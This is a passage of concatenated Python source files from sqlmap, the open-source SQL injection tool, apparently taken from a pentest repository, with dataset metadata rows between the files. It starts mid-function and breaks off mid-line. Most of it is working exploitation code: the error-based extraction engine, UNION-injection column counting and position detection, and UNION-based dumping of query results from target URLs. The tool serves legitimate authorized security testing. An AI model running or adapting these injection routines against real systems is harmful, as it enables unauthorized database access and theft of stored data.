partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': finalValue = partialValue[:-INFERENCE_BLANK_BREAK] break if (lastChar > 0 and index >= lastChar): finalValue = "" if length == 0 else partialValue finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue partialValue = None break except KeyboardInterrupt: abortedFlag = True finally: kb.prependFlag = False kb.stickyLevel = None retrievedLength = len(finalValue or "") if finalValue is not None: finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue hashDBWrite(expression, finalValue) elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"): infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"): dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: infoMsg = "retrieved: %s" % filterControlChars(finalValue) logger.info(infoMsg) if kb.threadException: raise SqlmapThreadException("something unexpected happened inside the threads") if abortedFlag: raise KeyboardInterrupt _ = finalValue or partialValue return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): """ Returns the query output length. """ infoMsg = "retrieving the length of query output" logger.info(infoMsg) lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) if length == " ": length = 0 return length
27,658
Python
.py
485
39.309278
186
0.555621
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,964
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/blind/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,965
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/error/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique from lib.core.common import isListLike from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue from lib.core.convert import hexdecode from lib.core.convert import htmlunescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import HTTP_HEADER from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar def _oneShotErrorUse(expression, field=None): offset = 1 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) if retVal and PARTIAL_VALUE_MARKER in retVal: partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue)) offset += len(partialValue) threadData.resumed = retVal is not None and not partialValue if Backend.isDbms(DBMS.MYSQL): chunk_length = MYSQL_ERROR_CHUNK_LENGTH elif Backend.isDbms(DBMS.MSSQL): chunk_length = MSSQL_ERROR_CHUNK_LENGTH else: chunk_length = None if retVal is None or partialValue: try: while True: check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start) if field: nulledCastedField = agent.nullAndCastField(field) if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) # Forge the error-based SQL injection request vector = kb.injection.data[kb.technique].vector query = agent.prefixQuery(vector) query = agent.suffixQuery(query) injExpression = expression.replace(field, nulledCastedField, 1) if field else expression injExpression = unescaper.escape(injExpression) injExpression = query.replace("[QUERY]", injExpression) payload = agent.payload(newValue=injExpression) # Perform the request page, headers = Request.queryPage(payload, content=True, raise404=False) incrementCounter(kb.technique) if page and conf.noEscape: page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) # Parse the returned page to get the exact error-based # SQL injection output output = reduce(lambda x, y: x if x is not None else y, (\ extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE), \ extractRegexResult(check, threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ None) if output is not None: output = getUnicode(output) else: trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE) \ or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) if not kb.testMode: check = "(?P<result>.*?)%s" % kb.chars.stop[:2] output = extractRegexResult(check, trimmed, re.IGNORECASE) if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): if offset == 1: retVal = output else: retVal += output if output else '' if output and len(output) >= chunk_length: offset += chunk_length else: break if kb.fileReadMode and output: dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) else: retVal = output break except: if retVal is not None: hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise retVal = decodeHexValue(retVal) if conf.hexConvert else retVal if isinstance(retVal, basestring): retVal = htmlunescape(retVal).replace("<br>", "\n") retVal = _errorReplaceChars(retVal) if retVal is not None: hashDBWrite(expression, retVal) else: _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal def _errorFields(expression, expressionFields, expressionFieldsList, num=None, emptyFields=None, suppressOutput=False): values = [] origExpr = None threadData = getCurrentThreadData() for field in expressionFieldsList: output = None if field.startswith("ROWNUM "): continue if isinstance(num, int): origExpr = expression expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression else: expressionReplaced = expression.replace(expressionFields, field, 1) output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field) if not kb.threadContinue: return None if not suppressOutput: if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) if isinstance(num, int): expression = origExpr values.append(output) return values def _errorReplaceChars(value): """ Restores safely replaced characters """ retVal = value if value: retVal = retVal.replace(kb.chars.space, " ").replace(kb.chars.dollar, "$").replace(kb.chars.at, "@").replace(kb.chars.hash_, "#") return retVal def _formatPartialContent(value): """ Prepares (possibly hex-encoded) partial content for safe console output """ if value and isinstance(value, basestring): try: value = hexdecode(value) except: pass finally: value = safecharencode(value) return value def errorUse(expression, dump=False): """ Retrieve the output of a SQL query taking advantage of the error-based SQL injection vulnerability on the affected parameter. """ initTechnique(kb.technique) abortedFlag = False count = None emptyFields = [] start = time.time() startLimit = 0 stopLimit = None value = None _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in expression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] _, _, _, _, _, _, countedExpressionFields, _ = agent.getFields(countedExpression) count = unArrayizeValue(_oneShotErrorUse(countedExpression, countedExpressionFields)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and not count.isdigit(): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: message = "due to huge table size do you want to remove " message += "ORDER BY clause gaining speed over consistency? [y/N] " _ = readInput(message, default="N") if _ and _[0] in ("y", "Y"): expression = expression[:expression.index(" ORDER BY ")] numThreads = min(conf.threads, (stopLimit - startLimit)) threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): for field in expressionFieldsList: if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': emptyFields.append(field) debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def errorThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) if not kb.threadContinue: break if output and isListLike(output) and len(output) == 1: output = output[0] with kb.locks.value: index = None if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, output)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: threadData.shared.lastFlushed += 1 threadData.shared.value.append(threadData.shared.buffered[0][1]) del threadData.shared.buffered[0] runThreads(numThreads, errorThread) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): value = value[0] duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[kb.technique], duration) logger.debug(debugMsg) return value
17,623
Python
.py
326
40.726994
186
0.609085
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,966
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/error/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,967
test.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/test.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import random import re from lib.core.agent import agent from lib.core.common import average from lib.core.common import Backend from lib.core.common import isNullValue from lib.core.common import listToStrValue from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev from lib.core.common import wasLastResponseDBMSError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import PAYLOAD from lib.core.settings import LIMITED_ROWS_TEST_NUMBER from lib.core.settings import UNION_MIN_RESPONSE_CHARS from lib.core.settings import UNION_STDEV_COEFF from lib.core.settings import MIN_RATIO from lib.core.settings import MAX_RATIO from lib.core.settings import MIN_STATISTICAL_RANGE from lib.core.settings import MIN_UNION_RESPONSES from lib.core.settings import NULL from lib.core.settings import ORDER_BY_STEP from lib.core.unescaper import unescaper from lib.request.comparison import comparison from lib.request.connect import Connect as Request def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): """ Finds number of columns affected by UNION based injection """ retVal = None def _orderByTechnique(): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) if _orderByTest(1) and not _orderByTest(randomInt()): infoMsg = "ORDER BY technique seems to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. Automatically extending the " infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) lowCols, highCols = 1, ORDER_BY_STEP found = None while not found: if _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP else: while not found: mid = highCols - (highCols - lowCols) / 2 if _orderByTest(mid): lowCols = mid else: highCols = mid if (highCols - lowCols) < 2: found = lowCols return found pushValue(kb.errorIsNone) items, ratios = [], [] kb.errorIsNone = False lowerCount, upperCount = conf.uColsStart, conf.uColsStop if lowerCount == 1: found = kb.orderByColumns or _orderByTechnique() if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") singleTimeLogMessage(infoMsg) return found if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: upperCount = lowerCount + MIN_UNION_RESPONSES min_, max_ = MAX_RATIO, MIN_RATIO pages = {} for count in xrange(lowerCount, upperCount + 1): query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): pages[count] = page ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO ratios.append(ratio) min_, max_ = min(min_, ratio), max(max_, ratio) items.append((count, ratio)) if not isNullValue(kb.uChar): for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] if len(filter(lambda x: x[1], contains)) == 1: retVal = filter(lambda x: x[1], contains)[0][0] break if not retVal: ratios.pop(ratios.index(min_)) ratios.pop(ratios.index(max_)) minItem, maxItem = None, None for item in items: if item[1] == min_: minItem = item elif item[1] == max_: maxItem = item if all(map(lambda x: x == min_ and x != max_, ratios)): retVal = maxItem[0] elif all(map(lambda x: x != min_ and x == max_, ratios)): retVal = minItem[0] elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: deviation = stdev(ratios) lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation if min_ < lower: retVal = minItem[0] if max_ > upper: if retVal is None or abs(max_ - upper) > abs(min_ - lower): retVal = maxItem[0] kb.errorIsNone = popValue() if retVal: infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal singleTimeLogMessage(infoMsg) return retVal def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): validPayload = None vector = None positions = range(0, count) # Unbiased approach for searching appropriate usable column random.shuffle(positions) # For each column of the table (# of NULL) perform a request using # the UNION ALL SELECT statement to test it the target URL is # affected by an exploitable union SQL injection vulnerability for position in positions: # Prepare expression with delimiters randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.escape(randQueryProcessed) # Forge the union SQL injection request query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ payload, True) or "") if content and phrase in content: validPayload = payload kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) if where == PAYLOAD.WHERE.ORIGINAL: # Prepare expression with delimiters randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) # Confirm that it is a full union SQL injection query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") if not all(_ in content for _ in (phrase, phrase2)): vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) elif not kb.unionDuplicates: fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) # Check for limited row output query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ payload, True) or "") if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: warnMsg = "output with limited number of rows detected. Switching to partial mode" logger.warn(warnMsg) vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() if unionErrorCase and count > 1: warnMsg = "combined UNION/error-based SQL injection case found on " warnMsg += "column %d. sqlmap will try to find another " % (position + 1) warnMsg += "column with better characteristics" logger.warn(warnMsg) else: break return validPayload, vector def _unionConfirm(comment, place, parameter, prefix, suffix, count): validPayload = None vector = None # Confirm the union SQL injection and get the exact column # position which can be used to extract data validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count) # Assure that the above function found the exploitable full union # SQL injection position if not validPayload: validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) return validPayload, vector def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): """ This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 50 columns on the target database table """ validPayload = None vector = None # In case that user explicitly stated number of columns affected if conf.uColsStop == conf.uColsStart: count = conf.uColsStart else: count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) if count: validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): warnMsg = "if UNION based SQL injection is not detected, " warnMsg += "please consider " if not conf.uChar and count > 1 and kb.uChar == NULL: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " test = readInput(message, default="Y") if test[0] not in ("y", "Y"): warnMsg += "usage of option '--union-char' " warnMsg += "(e.g. '--union-char=1') " else: conf.uChar = kb.uChar = str(randomInt(2)) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) if not conf.dbms: if not conf.uChar: warnMsg += "and/or try to force the " else: warnMsg += "forcing the " warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " if not all([validPayload, vector]) and not warnMsg.endswith("consider "): singleTimeWarnMessage(warnMsg) return validPayload, vector def unionTest(comment, place, parameter, value, prefix, suffix): """ This method tests if the target URL is affected by an union SQL injection vulnerability. The test is done up to 3*50 times """ if conf.direct: return kb.technique = PAYLOAD.TECHNIQUE.UNION validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) if validPayload: validPayload = agent.removePayloadDelimiters(validPayload) return validPayload, vector
13,949
Python
.py
254
44.425197
244
0.644031
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,968
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/use.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult from lib.core.common import flattenValue from lib.core.common import getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter from lib.core.common import initTechnique from lib.core.common import isListLike from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import parseUnionPage from lib.core.common import removeReflectiveValues from lib.core.common import singleTimeDebugMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import wasLastResponseDBMSError from lib.core.convert import htmlunescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapSyntaxException from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar from thirdparty.odict.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: # Prepare expression with delimiters injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) # Forge the union SQL injection request vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector kb.unionDuplicates = vector[7] kb.forcePartialUnion = vector[8] query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] payload = agent.payload(newValue=query, where=where) # Perform the request page, headers = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) # Parse the returned page to get the exact union-based # SQL injection output def _(regex): return reduce(lambda x, y: x if x is not None else y, (\ extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ None) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): warnMsg = "automatically patching output having last char trimmed" singleTimeWarnMessage(warnMsg) page = page.replace(kb.chars.stop[:-1], kb.chars.stop) retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) else: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) return retVal def configUnion(char=None, columns=None): def _configUnionChar(char): if not isinstance(char, basestring): return kb.uChar = char if conf.uChar is not None: kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) def _configUnionCols(columns): if not isinstance(columns, basestring): return columns = columns.replace(" ", "") if "-" in columns: colsStart, colsStop = columns.split("-") else: colsStart, colsStop = columns, columns if not colsStart.isdigit() or not colsStop.isdigit(): raise SqlmapSyntaxException("--union-cols must be a range of integers") conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) if conf.uColsStart > conf.uColsStop: errMsg = "--union-cols range has to be from lower to " errMsg += "higher number of columns" raise SqlmapSyntaxException(errMsg) _configUnionChar(char) _configUnionCols(conf.uCols or columns) def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if 